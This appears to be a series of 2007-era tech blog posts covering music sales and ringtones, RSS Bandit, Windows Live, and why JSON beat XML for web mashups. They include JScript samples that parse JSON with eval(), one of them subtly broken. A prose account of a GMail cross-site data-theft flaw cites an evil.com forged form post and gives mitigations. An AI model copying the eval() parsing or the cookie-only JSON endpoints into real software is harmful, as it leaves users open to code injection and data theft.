With the exception of new age, the smallest genre tracked by Nielsen SoundScan, R&B and rap suffered the biggest declines in 2006 of all styles of music. R&B, with album scans of 117 million units, was down 18.4% from 2005, while the rap subgenre's 59.5 million scans were down 20.7%. Total U.S. album sales fell 4.9% to 588.2 million units. Since 2000, total album sales have slid 25%, but R&B is down 41.4% and rap down 44.4%. In 2000, R&B accounted for 25.4% of total album sales, and rap 13.6%. In 2006, their respective shares fell to nearly 20% and 10%.
...
Merchants point to large second-week declines in new albums. For example, Jay-Z's 2006 "Kingdom Come" album debuted with 680,000 units in its first week and then dropped nearly 80%, to almost 140,000 units.
...
"Downloading and Internet file sharing is a problem and the labels are really late in fixing it," Czar Entertainment CEO and manager of the Game Jimmy Rosemond says. "With an artist like Game, his album leaked before it came out, and I had 4 million people downloading it."
...
In 2006, the best-selling rap album was T.I.'s "King," which sold 1.6 million copies, while the best-selling R&B album was Beyonce's "B'Day," which moved 1.8 million units. But those are exceptions.
...
A senior executive at one major label says ringtone revenue now exceeds track download revenue. And since Nielsen RingScan started tracking master ringtones in September, rap and R&B have comprised 87% of scans generated by the top 10 sellers.

Interscope's Marshall points out that Jibbs, for example, "has sold an incredible 1.4 million ringtones" -- a figure that might well offset lost album revenue. The rapper has moved 196,000 units of his "Jibbs Feat. Jibbs" album since its October 24 release. But figuring the ringtones he's sold at $2 apiece translates into $2.8 million in revenue, the equivalent of another 233,000 albums at a wholesale cost of $12 per unit.

And, Marshall adds, Chamillionaire has moved more than 3 million ringtones on top of scanning nearly 900,000 units of his "Sound of Revenge" album.

Some look at the above data and see it is an argument that the long tail spells the end of the hit. Others look at it and see it as more evidence that piracy is destroying the music industry. Or it may just be a sign that hip hop is finally played out. Me, I look at the ringtone industry and wonder whether it doesn't stand out as an example of where walled gardens and closed platforms have worked out quite well for the platform vendors and their partners yet [almost] detrimentally for consumers.


 

Categories: Current Affairs

Recently an RSS Bandit user made a feature request on our forums about a Good Google Reader Feature and wrote

On RSS Bandit, while reading all the news from a feed at the same time on the reading pane (feed selected) and scrolling down to read all news, you scroll all the page and nothing is marked as readed. This only happen when you select the message on Feed Details. On Google Reader every new you scroll down became marked as readed automatically. It's a very simple and natural scheme. Works really well, just check out http://reader.google.com.

I checked out Google Reader and I had to agree that the feature is pretty hot, so yesterday I brushed up on my knowledge of the HTML DOM and added the feature to RSS Bandit. Below is a video showing the new feature in action

What's funny is that Andy Edmonds asked me for this feature a couple of years ago and I never attempted to add it because at the time I was intimidated by Javascript and DHTML. It turned out to be a lot easier than I thought.

RSS Bandit users can expect to see this feature in the next beta of the Jubilee release which should be available in the next week and a half. It would be sooner but unfortunately I'm on my way to Las Vegas to attend CES for most of next week and Torsten is on vacation. By the way, users of Windows Vista should be glad to know that the next beta will finally run fine on that operating system.

NOTE: The slowness in the video is due to the fact that my CPU is pegged at 100% while capturing the screencast with Windows Media Encoder. This feature doesn't noticeably affect the performance of the application while running regularly.


 

Categories: RSS Bandit

Joel Spolsky has an seminal article entitled Don't Let Architecture Astronauts Scare You where he wrote

A recent example illustrates this. Your typical architecture astronaut will take a fact like "Napster is a peer-to-peer service for downloading music" and ignore everything but the architecture, thinking it's interesting because it's peer to peer, completely missing the point that it's interesting because you can type the name of a song and listen to it right away.

All they'll talk about is peer-to-peer this, that, and the other thing. Suddenly you have peer-to-peer conferences, peer-to-peer venture capital funds, and even peer-to-peer backlash with the imbecile business journalists dripping with glee as they copy each other's stories: "Peer To Peer: Dead!"

 The Architecture Astronauts will say things like: "Can you imagine a program like Napster where you can download anything, not just songs?" Then they'll build applications like Groove that they think are more general than Napster, but which seem to have neglected that wee little feature that lets you type the name of a song and then listen to it -- the feature we wanted in the first place. Talk about missing the point. If Napster wasn't peer-to-peer but it did let you type the name of a song and then listen to it, it would have been just as popular.

This article is relevant because I recently wrote a series of posts explaining why Web developers have begun to favor JSON over XML in Web Services. My motivation for writing this article were conversations I'd had with former co-workers who seemed intent on "abstracting" the discussion and comparing whether JSON was a better data format than XML in all the cases that XML is used today instead of understanding the context in which JSON has become popular.

In the past two weeks, I've seen three different posts from various XML heavy hitters committing this very sin

  1. JSON and XML by Tim Bray - This kicked it off and starts off by firing some easily refutable allegations about the extensibility and unicode capabilities of JSON as a general data transfer format.
  2. Tim Bray on JSON and XML by Don Box - Refutes the allegations by Tim Bray above but still misses the point.
  3. All markup ends up looking like XML by David Megginson - argues that XML is just like JSON except with the former we use angle brackets and in the latter we use curly braces + square brackets. Thus they are "Turing" equivalent. Academically interesting but not terribly useful information if you are a Web developer trying to get things done.

This is my plea to you, if you are an XML guru and you aren't sure why JSON seems to have come out of nowhere to threaten your precious XML, go read JSON vs. XML: Browser Security Model and JSON vs. XML: Browser Programming Models then let's have the discussion.

If you're too busy to read them, here's the executive summary. JSON is a better fit for Web services that power Web mashups and AJAX widgets due to the fact it gets around the cross domain limitations put in place by browsers that hamper XMLHttpRequest and that it is essentially serialized Javascript objects which makes it fit better client side scripting which is primarily done in Javascript. That's it. XML will never fit the bill as well for these scenarios without changes to the existing browser ecosystem which I doubt are forthcoming anytime soon.

Update: See comments by David Megginson and Steve Marx below.


 

Categories: XML

It's a new year and time for another brand new Windows Live service to show up in beta. This time it's the Windows Live for TV Beta which is described as follows

What it is
Windows Live™ for TV Beta is a rich, graphically-driven interface designed for people who use Windows Live Spaces and Messenger and Live Call on large-screen monitors and TVs. We're still in the early stages of this beta, so many of the features might not work properly yet. That's why we really need your feedback! This beta is in limited release, so you must request access to the trial group. After you’re in the beta, come back to this page and let us know what you think.

You can also find out more about the product on the team's blog at http://wlfortv.spaces.live.com which includes the following screenshot

Hey, I think I can see me in that screen shot. :)


 

Categories: Windows Live

A perennial topic for debate on certain mailing lists at work is rich client (i.e. desktop) software versus Web-based software. For every person that sings the praises of Web-based program such as Windows Live Mail, there's someone to wag their finger who points out that "it doesn't work offline" and "not everyone has a broadband connection". A lot of these discussions have become permathreads on the some of the mailing lists I'm one and I can recite detailed arguments for both sides in my sleep.

However I think both sides miss the point and agree more than they disagree. The fact is that highly connected societies such as the North America and Western Europe computer usage overlaps almost completely with internet usage (see Nielsen statistics for U.S. homes and Top 25 most connected countries). This trend will only increase as internet penetration spreads across developing countries emerging markets. 

What is important to understand is that for a lot of computer users, their computer is an overpriced paperweight if it doesn't have an Internet connection. They can't read the news, can't talk to their friends via IM, can't download music to their iPods Zunes, can't people watch on Facebook or MySpace, can't share the pictures they just took with their digital cameras, can't catch up on the goings on at work via email, they can't look up driving directions, can't check the weather report, can't do research for any reports they have to write and the list goes on. Keeping in mind that connectivity is key is far more important than whether the user experience is provided via a desktop app written using Win32 or is a "Web 2.0" website powered by AJAX. Additionally, the value of approachability and ease of use over "features" and "richness" cannot be emphasized enough.

Taken from that perspective, a lot of things people currently consider "features" of desktop applications are actually bugs in todays Internet-connected world. For example, I have different files in the "My Documents" folders on the 3 or 4 PCs I use regularly. Copying files between PCs and keeping track of what version of what file is where is an annoyance. FolderShare to the rescue.

When I'm listening to my music on my computer I sometimes want to be able to find out what music my friends are listening to, recommend my music to friends or just find music similar to what I'm currently playing. Last.fm and iLike to the rescue.

The last time I was on vacation in Nigeria, I wanted to check up on what was going on at work but never had access to a computer with Outlook installed nor could I have actually set it up to talk to my corporate account even if I could. Outlook Web Access to the rescue.

Are these arguments for Web-based or desktop software? No. Instead they are meant to point out that improving the lives of computer users should mean finding better ways of harnessing their internet connections and their social connections to others. Sometimes this means desktop software,   sometimes it will mean Web-based software and sometimes it will be both.


 

Categories: Technology

Over the holidays I had a chance to talk to some of my old compadres from the XML team at Microsoft and we got to talking about the JSON as an alternative to XML. I concluded that there are a small number of key reasons that JSON is now more attractive than XML for kinds of data interchange that powers Web-based mashups and Web gadgets widgets. This is the second in a series of posts on what these key reasons are.

In my previous post, I mentioned that getting around limitations in cross domain requests imposed by modern browsers has been a key reason for the increased adoption of JSON. However this is only part of the story.

Early on in the adoption of AJAX techniques across various Windows Live services I noticed that even for building pages with no cross domain requirements, our Web developers favored JSON to XML. One response that kept coming up is the easier programming model when processing JSON responses on the client than with XML. I'll illustrate this difference in ease of use via a JScript code that shows how to process a sample document in both XML and JSON formats taken from the JSON website. Below is the code sample

var json_menu = '{"menu": {' + '\n' +
'"id": "file",' + '\n' +
'"value": "File",' + '\n' +
'"popup": {' + '\n' +
'"menuitem": [' + '\n' +
'{"value": "New", "onclick": "CreateNewDoc()"},' + '\n' +
'{"value": "Open", "onclick": "OpenDoc()"},' + '\n' +
'{"value": "Close", "onclick": "CloseDoc()"}' + '\n' +
']' + '\n' +
'}' + '\n' +
'}}';


var xml_menu = '<menu id="file" value="File">' + '\n' +
'<popup>' + '\n' +
'<menuitem value="New" onclick="CreateNewDoc()" />' + '\n' +
'<menuitem value="Open" onclick="OpenDoc()" />' + '\n' +
'<menuitem value="Close" onclick="CloseDoc()" />' + '\n' +
'</popup>' + '\n' +
'</menu>';

WhatHappensWhenYouClick_Xml(xml_menu);
WhatHappensWhenYouClick_Json(json_menu);

function WhatHappensWhenYouClick_Json(data){

  var j = eval("(" + data + ")");

  WScript.Echo("
When you click the " + j.menu.value + " menu, you get the following options");

  for(var i = 0; i < j.menu.popup.menuitem.length; i++){
   WScript.Echo((i + 1) + "." + j.menu.popup.menuitem[i].value
    + " aka " + j.menu.popup.menuitem[i].onclick);
  }

}

function WhatHappensWhenYouClick_Xml(data){

  var x = new ActiveXObject( "Microsoft.XMLDOM" );
  x.loadXML(data);

  WScript.Echo("When you click the " + x.documentElement.getAttribute("value")
                + " menu, you get the following options");

  var nodes = x.documentElement.selectNodes("//menuitem");

  for(var i = 0; i < nodes.length; i++){
   WScript.Echo((i + 1) + "." + nodes[i].getAttribute("value") + " aka " + nodes[i].getAttribute("onclick"));
  }
}

When comparing both sample functions, it seems clear that the XML version takes more code and requires a layer of mental indirection as the developer has to be knowledgeable about XML APIs and their idiosyncracies. We should dig a little deeper into this. 

A couple of people have already replied to my previous post to point out that any good Web application should process JSON responses to ensure they are not malicious. This means my usage of eval() in the code sample, should be replaced with JSON parser that only accepts 'safe' JSON responses. Given that that there are JSON parsers available that come in under 2KB that particular security issue is not a deal breaker.

On the XML front, there is no off-the-shelf manner to get a programming model as straightforward and as flexible as that obtained from parsing JSON directly into objects using eval(). One light on the horizon is that E4X becomes widely implemented in Web browsers . With E4X, the code for processing the XML version of the menu document above would be 

function WhatHappensWhenYouClick_E4x(data){

  var e = new XML(data);

  WScript.Echo("When you click the " + j.menu.value + " menu, you get the following options");

  foreach(var m in e.menu.popup.menuitem){
   WScript.Echo( m.@value + " aka " + m.@onclick);
  }

}

However as cool as the language seems to be it is unclear whether E4X will ever see mainstream adoption. There is an initial implementation of E4X in the engine that powers the Firefox browser which seems to be incomplete. On the other hand, there is no indication that either Opera or Internet Explorer will support E4X in the future.

Another option for getting the simpler object-centric programming models out of XML data could be to adopt a simple XML serialization format such as XML-RPC and providing off-the-shelf Javascript parsers for this data format. A trivial implementation could be for the parser to convert XML-RPC to JSON using XSLT then eval() the results. However it is unlikely that people would go through that trouble when they can just use JSON.

This may be another nail in the coffin of XML on the Web. 


 

Categories: Web Development | XML | XML Web Services

Over the holidays I had a chance to talk to some of my old compadres from the XML team at Microsoft and we got to talking about the JSON as an alternative to XML. I concluded that there are a small number of key reasons that JSON is now more attractive than XML for kinds of data interchange that powers Web-based mashups and Web gadgets widgets. This is the first in a series of posts on what these key reasons are.

The first "problem" that chosing JSON over XML as the output format for a Web service solves is that it works around security features built into modern browsers that prevent web pages from initiating certain classes of communication with web servers on domains other than the one hosting the page. This "problem" is accurately described in the XML.com article Fixing AJAX: XMLHttpRequest Considered Harmful which is excerpted below

But the kind of AJAX examples that you don't see very often (are there any?) are ones that access third-party web services, such as those from Amazon, Yahoo, Google, and eBay. That's because all the newest web browsers impose a significant security restriction on the use of XMLHttpRequest. That restriction is that you aren't allowed to make XMLHttpRequests to any server except the server where your web page came from. So, if your AJAX application is in the page http://www.yourserver.com/junk.html, then any XMLHttpRequest that comes from that page can only make a request to a web service using the domain www.yourserver.com. Too bad -- your application is on www.yourserver.com, but their web service is on webservices.amazon.com (for Amazon). The XMLHttpRequest will either fail or pop up warnings, depending on the browser you're using.

On Microsoft's IE 5 and 6, such requests are possible provided your browser security settings are low enough (though most users will still see a security warning that they have to accept before the request will proceed). On Firefox, Netscape, Safari, and the latest versions of Opera, the requests are denied. On Firefox, Netscape, and other Mozilla browsers, you can get your XMLHttpRequest to work by digitally signing your script, but the digital signature isn't compatible with IE, Safari, or other web browsers.

This restriction is a significant annoyance for Web developers because it eliminates a number of compelling end user applications due to the limitations it imposes on developers. However, there are a number of common workarounds which are also listed in the article

Solutions Worthy of Paranoia

There is hope, or rather, there are gruesome hacks, that can bring the splendor of seamless cross-browser XMLHttpRequests to your developer palette. The three methods currently in vogue are:

  1. Application proxies. Write an application in your favorite programming language that sits on your server, responds to XMLHttpRequests from users, makes the web service call, and sends the data back to users.
  2. Apache proxy. Adjust your Apache web server configuration so that XMLHttpRequests can be invisibly re-routed from your server to the target web service domain.
  3. Script tag hack with application proxy (doesn't use XMLHttpRequest at all). Use the HTML script tag to make a request to an application proxy (see #1 above) that returns your data wrapped in JavaScript. This approach is also known as On-Demand JavaScript.

Although the first two approaches work, there are a number of problems with them. The first is that it adds a requirement that the owner of the page also have Web master level access to a Web server and either tweak its configuration settings or be a savvy enough programmer to write an application to proxy requests between a user's browser and the third part web service. A second problem is that it significantly increases the cost and scalability impact of the page because the Web page author now has to create a connection to the third party Web service for each user viewing their page instead of the user's browser making the connection. This can lead to a bottleneck especially if the page becomes popular. A final problem is that if the third party service requires authentication [via cookies] then there is no way to pass this information through the Web page author's proxy due to browser security models.

The third approach avoids all of these problems without a significant cost to either the Web page author or the provider of the Web service. An example of how this approach is utilized in practice is described in Simon Willison's post JSON and Yahoo!’s JavaScript APIs where he writes

As of today, JSON is supported as an alternative output format for nearly all of Yahoo!’s Web Service APIs. This is a Really Big Deal, because it makes Yahoo!’s APIs available to JavaScript running anywhere on the web without any of the normal problems caused by XMLHttpRequest’s cross domain security policy.

Like JSON itself, the workaround is simple. You can append two arguments to a Yahoo! REST Web Service call:

&output=json&callback=myFunction

The page returned by the service will look like this:

myFunction({ JSON data here });

You just need to define myFunction in your code and it will be called when the script is loaded. To make cross-domain requests, just dynamically create your script tags using the DOM:

var script = document.createElement('script');
script.type = 'text/javascript';
script.src = '...' + '&output=json&callback=myFunction';
document.getElementsByTagName('head')[0].appendChild(script);

People who are security minded will likely be shocked that this technique involves Web pages executing arbitrary code they retrieve from a third party site since this seems like a security flaw waiting to happen especially if the 3rd party site becomes compromised. One might also wonder what's the point of browsers restricting cross-domain HTTP requests if pages can load and run arbitrary Javascript code [not just XML data] from any domain.

However despite these concerns, it gets the job done with minimal cost to all parties involved and more often than not that is all that matters.

Postscript: When reading articles like Tim Bray's JSON and XML which primarily compares both data formats based on their physical qualities, it is good to keep the above information in mind since it explains a key reason JSON is popular on the Web today which turns out to be independent of any physical qualities of the data format. 


 

Categories: Web Development | XML | XML Web Services

Over the holidays I had a chance to talk to some of my old compadres from the XML team at Microsoft and we got to talking about the JSON as an alternative to XML. I concluded that there are a small number of key reasons that JSON is now more attractive than XML for kinds of data interchange that powers Web-based mashups and Web gadgets widgets. Expect a series of posts on this later today. 

I wasn't sure I was going to write about this until I saw Mike Arrington's blog post about a GMail vulnerability which implied that this is another data point in the XML vs. JSON debate. On reading about the vulnerability on Slashdot I disagree. This seems like a novice cross site scripting vulnerability that is independent of JSON or XML, and is succintly described in the Slashdot comment by TubeSteak which states

Here's the super simple explanation

1. Gmail sets a cookie saying you're logged in
2. A [3rd party] javascript tells you to call Google's script
3. Google checks for the Gmail cookie
4. The cookie is valid
5. Google hands over the requested data to you

If [3rd party] wanted to
keep your contact list, the javascript would pass it to a form and your computer would happily upload the list to [3rd party]'s server.

Mitigations to this problem are also well known and are also summarized in another Slashdot comment by buro9 who writes

When you surface data via Xml web services, you can only call the web service on the domain that the JavaScript calling it originates from. So if you write your web services with AJAX in mind exclusively, then you have made the assumption that JavaScript is securing your data.

The problem is created at two points:
1) When you rely on cookies to perform the implicit authentication that reveals the data.
2) When you allow rendering of the data in JSON which bypasses JavaScript cross-domain security.

This can be solved by doing two things:
1) Make one of the parameters to a web service a security token that authenticates the request.
2) Make the security token time-sensitive (a canary) so that a compromised token does not work if sniffed and used later.
.

The surprising thing is that I'd assumed that the knowledge of using canary values was commonplace but it took a lot longer than I expected to find a good bite size description of them. And when I did, it came from co-worker Yaron Goland in a comment to Mark Nottingham's post on DOM vs. Web where Yaron wrote

There are a couple of ways to deal with this situation:

Canaries - These are values that are generated on the fly and sent down with pages that contain forms. In the previous scenario evil.com wouldn't know what canary site X was using at that instant for that user and so its form post wouldn't contain the right value and would therefore be rejected. The upside about canaries is that they work with any arbitrary form post. The downside is that they require some server side work to generate and monitor the canary values. Hotmail, I believe, uses canaries.

Cookies - A variant on canaries is to use cookies where the page copies a value from a cookie into the form before sending it up. Since the browser security model only allows pages from the same domain to see that domain's cookie you know the page had to be from your domain. But this only works if the cookie header value isn't easily guessable so in practice it's really just canaries.

XMLHTTP - Using XMLHTTP it's possible to add HTTP headers so just throw in a header of any sort. Since forms can't add headers you know the request came from XMLHTTP and because of XMLHTTP's very strict domain security model you know the page that sent the request had to come from your site.

I guess just because something is common knowledge among folks building Web apps and toolkits at Microsoft doesn't mean it is common knowledge on the Web. This is another one of those things that everyone building Web applications should know about to secure their applications but very few actually learn.


 

Categories: Web Development